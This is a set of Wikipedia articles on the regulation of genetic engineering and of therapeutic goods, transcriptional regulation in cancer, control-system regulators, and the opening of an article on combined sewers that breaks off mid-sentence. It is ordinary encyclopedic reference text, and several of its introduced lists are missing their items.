In Europe the use of living GMOs are regulated by the European Directive on the contained use of genetically modified microorganisms (GMMs). [ 50 ] The regulations require risk assessments before use of any contained GMOs is started and assurances that the correct controls are in place. It provides the minimal standards for using GMMs, with individual countries allowed to enforce stronger controls. [ 53 ] In the UK the Genetically Modified Organisms (Contained Use) Regulations 2014 provides the framework researchers must follow when using GMOs. Other legislation may be applicable depending on what research is carried out. For workplace safety these include the Health and Safety at Work Act 1974 , the Management of Health and Safety at Work Regulations 1999 , the Carriage of Dangerous Goods legislation and the Control of Substances Hazardous to Health Regulations 2002 . Environmental risks are covered by Section 108(1) of the Environmental Protection Act 1990 and The Genetically Modified Organisms (Risk assessment) (Records and Exemptions) Regulations 1996. [ 54 ]
In the US the National Institute of Health (NIH) classifies GMOs into four risk groups. Risk group one is not associated with any diseases, risk group 2 is associated with diseases that are not serious, risk group 3 is associated with serious diseases where treatments are available and risk group 4 is for serious diseases with no known treatments. [ 50 ] In 1992 the Occupational Safety and Health Administration determined that its current legislation already adequately covers the safety of laboratory workers using GMOs. [ 52 ]
Australia has an exempt dealing for genetically modified organisms that only pose a low risk. These include systems using standard laboratory strains as the hosts, recombinant DNA that does not code for a vertebrate toxin or is not derived from a micro-organism that can cause disease in humans. Exempt dealings usually do not require approval from the national regulator. GMOs that pose a low risk if certain management practices are complied with are classified as notifiable low risk dealings. The final classification is for any uses of GMOs that do not meet the previous criteria. These are known as licensed dealings and include cloning any genes that code for vertebrate toxins or using hosts that are capable of causing disease in humans. Licensed dealings require the approval of the national regulator. [ 55 ]
Work with exempt GMOs do not need to be carried out in certified laboratories. All others must be contained in a Physical Containment level 1 (PC1) or Physical Containment level 2 (PC2) laboratories. Laboratory work with GMOs classified as low risk, which include knockout mice , are carried out in PC1 lab. This is the case for modifications that do not confer an advantage to the animal or doesn't secrete any infectious agents. If a laboratory strain that is used isn't covered by exempt dealings or the inserted DNA could code for a pathogenic gene, it must be carried out in a PC2 laboratory. [ 55 ]
The approaches taken by governments to assess and manage the risks associated with the use of genetic engineering technology and the development and release of GMOs vary from country to country, with some of the most marked differences occurring between the United States and Europe. [ 56 ] The United States takes on a less hands-on approach to the regulation of GMOs than in Europe, with the FDA and USDA only looking over pesticide and plant health facets of GMOs. [ 57 ] Despite the overall global increase in the production in GMOs, the European Union has still stalled GMOs fully integrating into its food supply. [ 58 ] This has definitely affected various countries, including the United States, when trading with the EU. [ 58 ] [ 59 ]
The European Union enacted regulatory laws in 2003 that provided possibly the most stringent GMO regulations in the world. [ 6 ] All GMOs, along with irradiated food , are considered "new food" and subject to extensive, case-by-case, science-based food evaluation by the European Food Safety Authority (EFSA). The criteria for authorization fall in four broad categories: "safety", "freedom of choice", "labelling", and "traceability". [ 60 ]
The European Parliament's Committee on the Environmental, Public Health, and Consumer Protection pushed forward and adopted a "safety first" principle regarding the case of GMOs, calling for any negative health consequences from GMOs to be held liable.
The history of the development of GM crop and GM food regulations in the EU has been challenged to develop a policy environment that is (a) efficient, (b) predicable, (c) accountable, (d) durable or (e) inter- jurisdictionally aligned. [ 61 ] However, although the European Union has had relatively strict regulations regarding genetically modified food, Europe is now allowing newer versions of modified maize and other agricultural produce. Also, the level of GMO acceptance in the European Union varies across its countries with Spain and Portugal being more permissive of GMOs than France and the Nordic population. [ 62 ] One notable exception however is Sweden. In this country, the government has declared that the GMO definition (according to Directive 2001/18/EC [ 63 ] ) stipulates that foreign DNA needs to be present in an organism for it to qualify as a genetically modified organisms. Organisms that have the foreign DNA removed (for example via selective breeding [ 64 ] ) therefore do not qualify as GMOs, even if gene editing has been used to make the organism. [ 65 ]
In June 2014 the European Parliament approved that individual member states are allowed to restrict or ban the growth of GM crops within their territory. Austria, France, Greece, Hungary, Germany, and Luxembourg had prohibited the growth or sale of bioengineered foods in their territory in 2015. [ 66 ] Scotland also announced its rejection. By 2015, sixteen countries declared they want to opt out of EU-approved GM crops, including GMOs from major companies like Monsanto , Dow , Syngenta and Pioneer. [ 67 ]
The U.S. regulatory policy is governed by the Coordinated Framework for Regulation of Biotechnology [ 68 ] The policy has three tenets: "(1) U.S. policy would focus on the product of genetic modification (GM) techniques, not the process itself, (2) only regulation grounded in verifiable scientific risks would be tolerated, and (3) GM products are on a continuum with existing products and, therefore, existing statutes are sufficient to review the products." [ 69 ]
For a genetically modified organism to be approved for release in the U.S., it must be assessed under the Plant Protection Act by the Animal and Plant Health Inspection Service (APHIS) agency within the USDA [ 70 ] and may also be assessed by the FDA and the EPA, depending on the intended use of the organism. The USDA evaluate the plants potential to become weeds, [ 70 ] the FDA reviews plants that could enter or alter the food supply, [ 71 ] and the EPA regulates genetically modified plants with pesticide properties, as well as agrochemical residues. [ 72 ]
In 2017 a proposed rule was withdrawn by APHIS after public comment. Agricultural stakeholders especially felt it would have excessively restricted genetic engineering and even new methods of conventional plant breeding . [ 73 ] [ 70 ]
The level of regulation in other countries lies in between Europe and the United States.
Common Market for Eastern and Southern Africa (COMASA) is responsible for assessing the safety of GMOs in most of Africa, although the final decision lies with each individual country. [ 74 ]
India and China are the two largest producers of genetically modified products in Asia. [ 75 ] The Office of Agricultural Genetic Engineering Biosafety Administration (OAGEBA) is responsible for regulation in China, [ 76 ] while in India it is the Institutional Biosafety Committee (IBSC), Review Committee on Genetic Manipulation (RCGM) and Genetic Engineering Approval Committee (GEAC). [ 77 ]
Brazil and Argentina are the 2nd and 3rd largest producers of GM food. [ 78 ] In Argentine assessment of GM products for release is provided by the National Agricultural Biotechnology Advisory Committee (environmental impact), the National Service of Health and Agrifood Quality (food safety) and the National Agribusiness Direction (effect on trade), with the final decision made by the Secretariat of Agriculture, Livestock, Fishery and Food. [ 79 ] In Brazil the National Biosafety Technical Commission is responsible for assessing environmental and food safety and prepares guidelines for transport, importation and field experiments involving GM products, while the Council of Ministers evaluates the commercial and economical issues with release. [ 79 ]
Health Canada and the Canadian Food Inspection Agency [ 80 ] are responsible for evaluating the safety and nutritional value of genetically modified foods released in Canada. [ 81 ]
License applications for the release of all genetically modified organisms in Australia is overseen by the Office of the Gene Technology Regulator , while regulation is provided by the Therapeutic Goods Administration for GM medicines or Food Standards Australia New Zealand for GM food. The individual state governments can then assess the impact of release on markets and trade and apply further legislation to control approved genetically modified products. [ 82 ] [ 83 ] The Australian Parliament relaxed the definition of GMOs, in 2019, to exclude certain GMOs from GMO regulation and government oversight. [ 84 ]
In Singapore , synthetic biology products are regulated as if they were genetically modified organisms under the Biological Agents and Toxins Act . For further review see Trump 2017. [ 85 ]
In Saudi Arabia's Neom project genetically engineered agriculture is legal, encouraged, and is funded by the government as an integral part of the project. [ 86 ]
One of the key issues concerning regulators is whether GM products should be labeled. Labeling can be mandatory up to a threshold GM content level (which varies between countries) or voluntary. A study investigating voluntary labeling in South Africa found that 31% of products labeled as GMO-free had a GM content above 1.0%. [ 4 ] In Canada and the United States labeling of GM food is voluntary, [ 5 ] while in Europe all food (including processed food ) or feed which contains greater than 0.9% of approved GMOs must be labelled. [ 6 ] In the US state of Oregon., voters rejected Measure 27, which would have required labeling of all genetically modified foods. [ 91 ] Japan, Malaysia, New Zealand, and Australia require labeling so consumers can exercise choice between foods that have genetically modified, conventional or organic origins. [ 92 ]
The Cartagena Protocol sets the requirements for the international trade of GMOs between countries that are signatories to it. Any shipments contain genetically modified organisms that are intended to be used as feed, food or for processing must be identified and a list of the transgenic events be available.
"Substantial equivalence" is a starting point for the safety assessment for GM foods that is widely used by national and international agencies—including the Canadian Food Inspection Agency, Japan's Ministry of Health and Welfare and the U.S. Food and Drug Administration, the United Nation's Food and Agriculture Organization, the World Health Organization and the OECD. [ 93 ]
A quote from FAO, one of the agencies that developed the concept, is useful for defining it: "Substantial equivalence embodies the concept that if a new food or food component is found to be substantially equivalent to an existing food or food component, it can be treated in the same manner with respect to safety (i.e., the food or food component can be concluded to be as safe as the conventional food or food component)". [ 94 ] The concept of substantial equivalence also recognises the fact that existing foods often contain toxic components (usually called antinutrients ) and are still able to be consumed safely—in practice there is some tolerable chemical risk taken with all foods, so a comparative method for assessing safety needs to be adopted. For instance, potatoes and tomatoes can contain toxic levels of respectively, solanine and alpha-tomatine alkaloids. [ 95 ] [ 96 ]
To decide if a modified product is substantially equivalent, the product is tested by the manufacturer for unexpected changes in a limited set of components such as toxins, nutrients, or allergens that are present in the unmodified food. The manufacturer's data is then assessed by a regulatory agency, such as the U.S. Food and Drug Administration . That data, along with data on the genetic modification itself and resulting proteins (or lack of protein), is submitted to regulators. If regulators determine that the submitted data show no significant difference between the modified and unmodified products, then the regulators will generally not require further food safety testing. However, if the product has no natural equivalent, or shows significant differences from the unmodified food, or for other reasons that regulators may have (for instance, if a gene produces a protein that had not been a food component before), the regulators may require that further safety testing be carried out. [ 39 ]
A 2003 review in Trends in Biotechnology identified seven main parts of a standard safety test: [ 97 ]
There has been discussion about applying new biochemical concepts and methods in evaluating substantial equivalence, such as metabolic profiling and protein profiling. These concepts refer, respectively, to the complete measured biochemical spectrum (total fingerprint) of compounds (metabolites) or of proteins present in a food or crop. The goal would be to compare overall the biochemical profile of a new food to an existing food to see if the new food's profile falls within the range of natural variation already exhibited by the profile of existing foods or crops. However, these techniques are not considered sufficiently evaluated, and standards have not yet been developed, to apply them. [ 98 ]
Transgenic animals have genetically modified DNA. Animals are different from plants in a variety of ways—biology, life cycles, or potential environmental impacts. [ 99 ] GM plants and animals were being developed around the same time, but due to the complexity of their biology and inefficiency with laboratory equipment use, their appearance in the market was delayed. [ 100 ]
There are six categories that genetically engineered (GE) animals are approved for: [ 101 ]
But see also:
Domingo, José L.; Bordonaba, Jordi Giné (2011). "A literature review on the safety assessment of genetically modified plants" (PDF) . Environment International . 37 (4): 734– 742. doi : 10.1016/j.envint.2011.01.003 . PMID 21296423 . In spite of this, the number of studies specifically focused on safety assessment of GM plants is still limited. However, it is important to remark that for the first time, a certain equilibrium in the number of research groups suggesting, on the basis of their studies, that a number of varieties of GM products (mainly maize and soybeans) are as safe and nutritious as the respective conventional non-GM plant, and those raising still serious concerns, was observed. Moreover, it is worth mentioning that most of the studies demonstrating that GM foods are as nutritional and safe as those obtained by conventional breeding, have been performed by biotechnology companies or associates, which are also responsible of commercializing these GM plants. Anyhow, this represents a notable advance in comparison with the lack of studies published in recent years in scientific journals by those companies.
Krimsky, Sheldon (2015). "An Illusory Consensus behind GMO Health Assessment" (PDF) . Science, Technology, & Human Values . 40 (6): 883– 914. doi : 10.1177/0162243915598381 . Archived from the original (PDF) on 2019-08-31. I began this article with the testimonials from respected scientists that there is literally no scientific controversy over the health effects of GMOs. My investigation into the scientific literature tells another story.
And contrast:
Panchin, Alexander Y.; Tuzhikov, Alexander I. (January 14, 2016). "Published GMO studies find no evidence of harm when corrected for multiple comparisons". Critical Reviews in Biotechnology . 37 (2): 213– 217. doi : 10.3109/07388551.2015.1130684 . ISSN 0738-8551 . PMID 26767435 . Here, we show that a number of articles some of which have strongly and negatively influenced the public opinion on GM crops and even provoked political actions, such as GMO embargo, share common flaws in the statistical evaluation of the data. Having accounted for these flaws, we conclude that the data presented in these articles does not provide any substantial evidence of GMO harm. The presented articles suggesting possible harm of GMOs received high public attention. However, despite their claims, they actually weaken the evidence for the harm and lack of substantial equivalency of studied GMOs. We emphasize that with over 1783 published articles on GMOs over the last 10 years it is expected that some of them should have reported undesired differences between GMOs and conventional crops even if no such differences exist in reality.
and | https://en.wikipedia.org/wiki/Regulation_of_genetic_engineering |
The regulation of therapeutic goods , defined as drugs and therapeutic devices , varies by jurisdiction. In some countries, such as the United States, they are regulated at the national level by a single agency. In other jurisdictions they are regulated at the state level, or at both state and national levels by various bodies, as in Australia.
The role of therapeutic goods regulation is designed mainly to protect the health and safety of the population. Regulation is aimed at ensuring the safety, quality, and efficacy of the therapeutic goods which are covered under the scope of the regulation. In most jurisdictions, therapeutic goods must be registered before they are allowed to be sold. There is usually some degree of restriction on the availability of certain therapeutic goods, depending on their risk to consumers.
Modern drug regulation has historical roots in the response to the proliferation of universal antidotes which appeared in the wake of Mithridates ' death. [ 1 ] Mithridates had brought together physicians, scientists, and shamans to concoct a potion that would make him immune to poisons. Following his death, the Romans became keen on further developing the Mithridates potion's recipe. Mithridatium re-entered western society through multiple means. The first was through the Leechbook of the Bald ( Bald's Leechbook ), written somewhere between 900 and 950, which contained a formula for various remedies, including for a theriac. Additionally, theriac became a commercial good traded throughout Europe based on the works of Greek and Roman physicians. [ 2 ]
The resulting proliferation of various recipes needed to be curtailed in order to ensure that people were not passing off fake antidotes, which led to the development of government involvement and regulation. Additionally, the creation of these concoctions took on ritualistic form and were often created in public and the process was observed and recorded. It was believed that if the concoction proved unsuccessful, it was due to the apothecaries' process of making them and they could be held accountable because of the public nature of the creation. [ 2 ]
In the ninth century, many Muslim countries established an office of the hisba , which in addition to regulating compliance to Islamic principles and values took on the role of regulating other aspects of social and economic life, including the regulation of medicines. Inspectors were appointed to employ oversight on those who were involved in the process of medicine creation and were given a lot of leeway to ensure compliance and punishments were stringent. [ 3 ] The first official 'act', the 'Apothecary Wares, Drugs and Stuffs' Act (also sometimes referred to as the 'Pharmacy Wares, Drugs and Stuffs' Act) was passed in 1540 by Henry VIII and set the foundation for others. Through this act, he encouraged physicians in his College of Physicians (founded by him in 1518) to appoint four people dedicated to consistently inspecting what was being sold in apothecary shops. [ 2 ] In conjunction with this first piece of legislation, there was an emergence of standard formulas for the creation of certain 'drugs' and 'antidotes' through Pharmacopoeias which first appeared in the form of a decree from Frederick II of Sicily in 1240 to use consistent and standard formulas. [ 4 ] The first modern pharmacopoeias were the Florence Pharmacopoeia published in 1498, [ 2 ] the Spanish Pharmacopoeia published in 1581 and the London Pharmacopoeia published in 1618. [ 5 ]
Various other events throughout history have demonstrated the importance of drug and medicine regulation keeping up with scientific advances. In 2006, the challenges associated with TGN 1412 highlighted the shortcomings of animal models and paved the way for further advances in regulation and development for biological products. Rofecoxib represents a drug that was on the market that had not clearly represent the risks associated with the use drug which led to the concept of 'risk management planning' within the field of regulation by introducing the need to understand how various safety concerns would be managed. Various cases over recent years have demonstrated the need for regulation to keep up with scientific advances that have implications for people's health. [ 6 ]
In the United States, regulation of drugs was originally a state right, as opposed to federal right. But with the increase in fraudulent practices due to private incentives to maximize profits and poor enforcement of state laws, the need for stronger federal regulation increased. [ 7 ] In 1906 President Roosevelt signed the Federal Food and Drug Act (FFDA) which both established stricter national standards for drug manufacture and sales, and also established the Federal government as the regulating authority over the US drug industry. [ 7 ] A 1911 Supreme Court decision, United States vs. Johnson , established that misleading statements were not covered under the FFDA. This directly led to Congress passing the Sherley Amendment which established a clearer definition of 'drug marketing requirements'. [ 7 ]
More catalysts for advances in drug regulation in the US were certain catastrophes that served as calls to the US government to step in and impose regulations that would prevent repeats of those instances. One such instance occurred in 1937 when more than a hundred people died from using sulfanilamide elixir which had not gone through any safety testing. [ 7 ] [ 4 ] This directly led to the passing of the Federal, Food, Drug, and Cosmetic Act in 1938. One other major catastrophe occurred in the late 1950s when Thalidomide, which was originally sold in Germany (introduced into a virtually unregulated market) and eventually sold around the world, led to approximately 100,000 babies being born with various deformities. [ 4 ] In 1962 the United States Congress passed the Drug Amendments Act of 1962 . The Drug Amendments Act required the FDA to ensure that new drugs being introduced to the market had passed certain tests and standards. [ 7 ]
The UK's Chief Medical Officer had established a group to look into safety of drugs on the market in 1959 prior to the crisis and was moving in the direction of address the problem of unregulated drugs entering the market. The crisis created a greater sense of emergency to establish safety and efficacy standards around the world. The UK started a temporary Committee on Safety of Drugs while they attempted to pass more comprehensive legislation. Though compliance and submission of drugs to the Committee on Safety of Drugs was not mandatory immediately after, the pharmaceutical industry later complied due to the thalidomide situation. [ citation needed ]
The European Economic Commission also passed a directive in 1965 in order to impose greater efficacy standards before marketing a drug. [ 6 ] Drug legislation in both the EU and US were passed in order to assure drug safety and efficacy. Of note, increased regulations and standards for testing actually led to greater innovation in pharmaceutical research in the 1960s, despite greater preclinical and clinical standards. [ 6 ] In 1989, the International Conference of Drug Regulatory Authorities organized by the WHO, officials from around the world discussed the necessity for streamlined processes for global drug approval. [ 4 ]
Therapeutic goods in Australia are regulated by the Therapeutic Goods Administration (TGA), which is a regulatory body of the Commonwealth Department of Health. [ 8 ] Access to medicines and poisons is regulated by the separation of substances into various schedules according to the Therapeutic Goods (Poisons Standard) Instrument, the Poisons Standard may also be cited as the Standard for the Uniform Scheduling of Medicines and Poisons (SUSMP). [ 9 ]
The Poisons Standard organises substances into 10 schedules (and unscheduled substances), [ 10 ] therapeutic goods are generally organised only into schedules 2, 3, 4 and 8:
Therapeutic goods in Brazil are regulated by the Ministry of Health of Brazil , through its Brazilian Health Regulatory Agency (Anvisa), equivalent to the US Food and Drug Administration . There are six main categories: [ citation needed ]
Biological medications are complex molecules of high molecular weight obtained from a biological source or biotechnological procedures and are divided by Anvisa into the following categories: [ 12 ]
The regulatory status of vaccines, which determines their marketing and distribution, may be one of the following established by Anvisa: [ 15 ]
Vaccines can only be administered in public health centers or authorized private vaccination services. [ 17 ]
In Canada, regulation of therapeutic goods is done by Health Canada and governed by the Food and Drug Act and associated regulations. In addition, the Controlled Drugs and Substances Act specifies additional regulatory requirements for controlled drugs and drug precursors. [ 18 ]
In Ontario , the Drug and Pharmacies Regulation Act governs "any substance that is used in the diagnosis, treatment, mitigation or prevention of a disease...in humans, animals or fowl." [ 19 ]
The regulation of drugs in China is governed by the National Medical Products Administration (NMPA) which replaced the former China Food and Drug Administration . [ citation needed ]
The regulation of drugs in Egypt is governed by the Egyptian Drug Authority (EDA)
The European Union (EU) medicines regulatory system is based on a network of around 50 regulatory authorities from the 31 EEA countries (28 EU Member States plus Iceland, Liechtenstein and Norway), the European Commission and European Medicines Agency (EMA). EMA and the Member States cooperate and share expertise in the assessment of new medicines and of new safety information. They also rely on each other for exchange of information in the regulation of medicine, for example regarding the reporting of side effects of medicines, the oversight of clinical trials, and the conduct of inspections of medicines' manufacturers and compliance with good clinical practice (GCP), good manufacturing practice (GMP), good distribution practice (GDP), and good pharmacovigilance practice (GVP). EU legislation requires that each Member State operates to the same rules and requirements regarding the authorisation and monitoring of medicines. [ 20 ]
Within the EU, EudraLex maintains the collection of rules and regulations governing medicinal products in the European Union, and the European Medicines Agency acts to regulate many of these rules and regulations. Amongst these rules and regulations are:
German law classifies drugs into
Medicines in Iceland are regulated by the Icelandic Medicines Control Agency . [ 21 ]
Medicines in India are regulated by Central Drugs Standard Control Organization (CDSCO) Under Ministry of Health and Family Welfare . Headed by Directorate General of Health Services(India).CDSCO regulates pharmaceutical products through Drugs Controller General of India (DCGI) at chair. [ citation needed ]
Drugs are classified under five headings. Under retail and distribution: [ citation needed ]
Under manufacturing practice:
Medicines in Indonesia are regulated by National Agency of Drug and Food Control of Indonesia .
Drugs in Indonesia are classified into: [ 22 ] [ 23 ]
Medicines in Ireland are regulated according to the Misuse of Drugs Regulations 1988 . Controlled drugs (CDs) are divided into five categories based on their potential for misuse and therapeutic effectiveness. [ citation needed ]
The regulation of drugs in Burma is governed by the Food and Drug Administration (Burma) and Food and Drug Board of Authority . [ citation needed ]
Medicines in Norway are regulated by the Norwegian Medical Products Agency . Drugs are divided into five groups:
Narcotics, sedative-hypnotics, and amphetamines in this class require a special prescription form :
Restricted substances which easily lead to addiction like: co-codamol , tramadol , diazepam , nitrazepam and all other benzodiazepines (with the exception of temazepam and flunitrazepam ) phentermine .
The Food and Drug Administration regulates drugs and medical devices in the Philippines . [ citation needed ]
Prohibited. Brands and packages not actively marketed in Sri Lanka. [ citation needed ]
Medicines in Switzerland are regulated by Swissmedic . The country is not part of the European Union , and is regarded by many as one of the easiest places to conduct clinical trials on new drug compounds. [ citation needed ]
There are five categories from A to E to cover different types of delivery category: [ 25 ]
Medicines for Human Use in the United Kingdom are regulated by the Medicines and Healthcare products Regulatory Agency (MHRA). The availability of drugs is regulated by classification by the MHRA as part of marketing authorisation of a product. [ citation needed ]
The United Kingdom has a three-tiered classification system: [ citation needed ]
Within POM, certain agents with a high abuse/addiction liability are also separately scheduled under the Misuse of Drugs Act 1971 (amended with the Misuse of Drugs Regulations 2001); and are commonly known as Controlled Drugs (CD).
Therapeutic goods in the United States are regulated by the U.S. Food and Drug Administration (FDA), which makes some drugs available over the counter (OTC) at retail outlets and others by prescription only . [ citation needed ]
The prescription or possession of some substances is controlled or prohibited by the Controlled Substances Act , under the FDA and the Drug Enforcement Administration (DEA). Some US states apply more stringent limits on the prescription of certain controlled substances C-V and BTC (behind the counter) drugs such as pseudoephedrine . Three primary branches of pharmacovigilance in the U.S. include the FDA, the pharmaceutical manufacturers, and the academic/non-profit organizations (such as RADAR and Public Citizen ). [ citation needed ] | https://en.wikipedia.org/wiki/Regulation_of_therapeutic_goods |
Generally, in progression to cancer, hundreds of genes are silenced or activated. Although silencing of some genes in cancers occurs by mutation, a large proportion of carcinogenic gene silencing is a result of altered DNA methylation (see DNA methylation in cancer ). DNA methylation causing silencing in cancer typically occurs at multiple CpG sites in the CpG islands that are present in the promoters of protein coding genes.
Altered expressions of microRNAs also silence or activate many genes in progression to cancer (see microRNAs in cancer ). Altered microRNA expression occurs through hyper/hypo-methylation of CpG sites in CpG islands in promoters controlling transcription of the microRNAs .
Silencing of DNA repair genes through methylation of CpG islands in their promoters appears to be especially important in progression to cancer (see methylation of DNA repair genes in cancer ).
In humans, about 70% of promoters located near the transcription start site of a gene (proximal promoters) contain a CpG island . [ 1 ] [ 2 ] CpG islands are generally 200 to 2000 base pairs long, have a C:G base pair content >50%, and have regions of DNA where a cytosine nucleotide is followed by a guanine nucleotide and this occurs frequently in the linear sequence of bases along its 5′ → 3′ direction . [ 3 ] [ 4 ]
Genes may also have distant promoters (distal promoters) and these frequently contain CpG islands as well. An example is the promoter of the DNA repair gene ERCC1 , where the CpG island-containing promoter is located about 5,400 nucleotides upstream of the coding region of the ERCC1 gene. [ 5 ] CpG islands also occur frequently in promoters for functional noncoding RNAs such as microRNAs . [ 6 ]
In humans, DNA methylation occurs at the 5′ position of the pyrimidine ring of the cytosine residues within CpG sites to form 5-methylcytosines . The presence of multiple methylated CpG sites in CpG islands of promoters causes stable inhibition (silencing) of genes. [ 7 ] Silencing of transcription of a gene may be initiated by other mechanisms, but this is often followed by methylation of CpG sites in the promoter CpG island to cause the stable silencing of the gene. [ 7 ]
In cancers, loss of expression of genes occurs about 10 times more frequently by transcription silencing (caused by promoter hypermethylation of CpG islands) than by mutations. As Vogelstein et al. point out, in a colorectal cancer there are usually about 3 to 6 driver mutations and 33 to 66 hitchhiker or passenger mutations. [ 8 ] In contrast, in colon tumors compared to adjacent normal-appearing colonic mucosa, there are about 600 to 800 heavily methylated CpG islands in promoters of genes in the tumors while these CpG islands are not methylated in the adjacent mucosa. [ 9 ] [ 10 ] [ 11 ]
Using gene set enrichment analysis, 569 out of 938 gene sets were hypermethylated and 369 were hypomethylated in cancers. Hypomethylation of CpG islands in promoters results in increased transcription of the genes or gene sets affected. [ 11 ]
One study [ 12 ] listed 147 specific genes with colon cancer-associated hypermethylated promoters and 27 with hypomethylated promoters, along with the frequency with which these hyper/hypo-methylations were found in colon cancers. At least 10 of those genes had hypermethylated promoters in nearly 100% of colon cancers. They also indicated 11 microRNAs whose promoters were hypermethylated in colon cancers at frequencies between 50% and 100% of cancers. MicroRNAs (miRNAs) are small endogenous RNAs that pair with sequences in messenger RNAs to direct post-transcriptional repression . On average, each microRNA represses or inhibits transcriptional expression of several hundred target genes. Thus microRNAs with hypermethylated promoters may be allowing enhanced transcription of hundreds to thousands of genes in a cancer. [ 13 ]
For more than 20 years, microRNAs have been known to act in the cytoplasm to degrade transcriptional expression of specific target gene messenger RNAs (see microRNA history ). However, recently, Gagnon et al. [ 14 ] showed that as many as 75% of microRNAs may be shuttled back into the nucleus of cells. Some nuclear microRNAs have been shown to mediate transcriptional gene activation or transcriptional gene inhibition. [ 15 ]
DNA repair genes are frequently repressed in cancers due to hypermethylation of CpG islands within their promoters. In head and neck squamous cell carcinomas at least 15 DNA repair genes have frequently hypermethylated promoters; these genes are XRCC1, MLH3, PMS1, RAD51B, XRCC3, RAD54B, BRCA1, SHFM1, GEN1, FANCE, FAAP20, SPRTN, SETMAR, HUS1, and PER1 . [ 16 ] About seventeen types of cancer are frequently deficient in one or more DNA repair genes due to hypermethylation of their promoters. [ 17 ] As summarized in one review article, promoter hypermethylation of the DNA repair gene MGMT occurs in 93% of bladder cancers, 88% of stomach cancers, 74% of thyroid cancers, 40%-90% of colorectal cancers and 50% of brain cancers. [ citation needed ] Promoter hypermethylation of LIG4 occurs in 82% of colorectal cancers. This review article also indicates promoter hypermethylation of NEIL1 occurs in 62% of head and neck cancers and in 42% of non-small-cell lung cancers ; promoter hypermetylation of ATM occurs in 47% of non-small-cell lung cancers ; promoter hypermethylation of MLH1 occurs in 48% of squamous cell carcinomas; and promoter hypermethylation of FANCB occurs in 46% of head and neck cancers . [ citation needed ]
On the other hand, the promoters of two genes, PARP1 and FEN1 , were hypomethylated and these genes were over-expressed in numerous cancers. PARP1 and FEN1 are essential genes in the error-prone and mutagenic DNA repair pathway microhomology-mediated end joining . If this pathway is over-expressed, the excess mutations it causes can lead to cancer. PARP1 is over-expressed in tyrosine kinase-activated leukemias, [ 18 ] in neuroblastoma, [ 19 ] in testicular and other germ cell tumors, [ 20 ] and in Ewing's sarcoma, [ 21 ] FEN1 is over-expressed in the majority of cancers of the breast, [ 22 ] prostate, [ 23 ] stomach, [ 24 ] [ 25 ] neuroblastomas, [ 26 ] pancreatic, [ 27 ] and lung. [ 28 ]
DNA damage appears to be the primary underlying cause of cancer. [ 29 ] [ 30 ] If accurate DNA repair is deficient, DNA damages tend to accumulate. Such excess DNA damage can increase mutational errors during DNA replication due to error-prone translesion synthesis . Excess DNA damage can also increase epigenetic alterations due to errors during DNA repair. Such mutations and epigenetic alterations can give rise to cancer (see malignant neoplasms ). Thus, CpG island hyper/hypo-methylation in the promoters of DNA repair genes are likely central to progression to cancer. [ 31 ] [ 32 ] | https://en.wikipedia.org/wiki/Regulation_of_transcription_in_cancer |
In automatic control , a regulator is a device which has the function of maintaining a designated characteristic. It performs the activity of managing or maintaining a range of values in a machine. The measurable property of a device is managed closely by specified conditions or an advance set value; or it can be a variable according to a predetermined arrangement scheme. It can be used generally to connote any set of various controls or devices for regulating or controlling items or objects.
Examples are a voltage regulator (which can be a transformer whose voltage ratio of transformation can be adjusted, or an electronic circuit that produces a defined voltage), a pressure regulator , such as a diving regulator , which maintains its output at a fixed pressure lower than its input, and a fuel regulator (which controls the supply of fuel).
Regulators can be designed to control anything from gases or fluids, to light or electricity. Speed can be regulated by electronic, mechanical, or electro-mechanical means. Such instances include;
This engineering-related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Regulator_(automatic_control) |
A combined sewer is a type of gravity sewer with a system of pipes, tunnels, pump stations etc. to transport sewage and urban runoff together to a sewage treatment plant or disposal site. This means that during rain events, the sewage gets diluted, resulting in higher flowrates at the treatment site. Uncontaminated stormwater simply dilutes sewage, but runoff may dissolve or suspend virtually anything it contacts on roofs, streets, and storage yards. [ 1 ] : 296 As rainfall travels over roofs and the ground, it may pick up various contaminants including soil particles and other sediment , heavy metals, organic compounds , animal waste, and oil and grease . Combined sewers may also receive dry weather drainage from landscape irrigation , construction dewatering , and washing buildings and sidewalks .
Combined sewers can cause serious water pollution problems during combined sewer overflow ( CSO ) events when combined sewage and surface runoff flows exceed the capacity of the sewage treatment plant, or of the maximum flow rate of the system which transmits the combined sources. In instances where exceptionally high surface runoff occurs (such as large rainstorms), the load on individual tributary branches of the sewer system may cause a back-up to a point where raw sewage flows out of input sources such as toilets, causing inhabited buildings to be flooded with a toxic sewage-runoff mixture, incurring massive financial burdens for cleanup and repair. When combined sewer systems experience these higher than normal throughputs, relief systems cause discharges containing human and industrial waste to flow into rivers, streams, or other bodies of water. Such events frequently cause both negative environmental and lifestyle consequences, including beach closures, contaminated shellfish unsafe for consumption, and contamination of drinking water sources, rendering them temporarily unsafe for drinking and requiring boiling before uses such as bathing or washing dishes. [ 2 ]
Mitigation of combined sewer overflows include sewer separation, CSO storage, expanding sewage treatment capacity, retention basins , screening and disinfection facilities, reducing stormwater flows, green infrastructure and real-time decision support systems .
This type of gravity sewer design is less often used nowadays when constructing new sewer systems. Modern-day sewer designs exclude surface runoff by building sanitary sewers instead, but many older cities and towns continue to operate previously constructed combined sewer systems. [ 3 ]
The earliest sewers were designed to carry street runoff away from inhabited areas and into surface waterways without treatment. Before the 19th century, it was commonplace to empty human waste receptacles, e.g., chamber pots , into town and city streets and slaughter animals in open street " shambles ". The use of draft animals such as horses and herding of livestock through city streets meant that most contained large amounts of excrement. Before the development of macadam as a paving material in the 19th century, paving systems were mostly porous, so that precipitation could soak away and not run off, and urban rooftop rainwater was often saved in rainwater tanks. Open sewers, consisting of gutters and urban streambeds, were common worldwide before the 20th century.
In the majority of developed countries, large efforts were made during the late 19th and early 20th centuries to cover the formerly open sewers, converting them to closed systems with cast iron, steel, or concrete pipes, masonry, and concrete arches, while streets and footpaths were increasingly covered with impermeable paving systems. Most sewage collection systems of the 19th and early to mid-20th century used single-pipe systems that collect both sewage and urban runoff from streets and roofs (to the extent that relatively clean rooftop rainwater was not saved in butts and cisterns for drinking and washing.) This type of collection system is referred to as a "combined sewer system". The rationale for combining the two was that it would be cheaper to build just a single system. [ 4 ] : 8 Most cities at that time did not have sewage treatment plants, so there was no perceived public health advantage in constructing a separate "surface water sewerage" (UK terminology) or " storm sewer " (US terminology) system. [ 2 ] : pp. 2–3 Moreover, before the automobile era, runoff was likely to be typically highly contaminated with animal waste. Further, until the mid-late 19th century the frequent use of shambles contributed more waste. The widespread replacement of horses with automotive propulsion, paving of city streets and surfaces, construction of municipal slaughterhouses, and provision of mains water in the 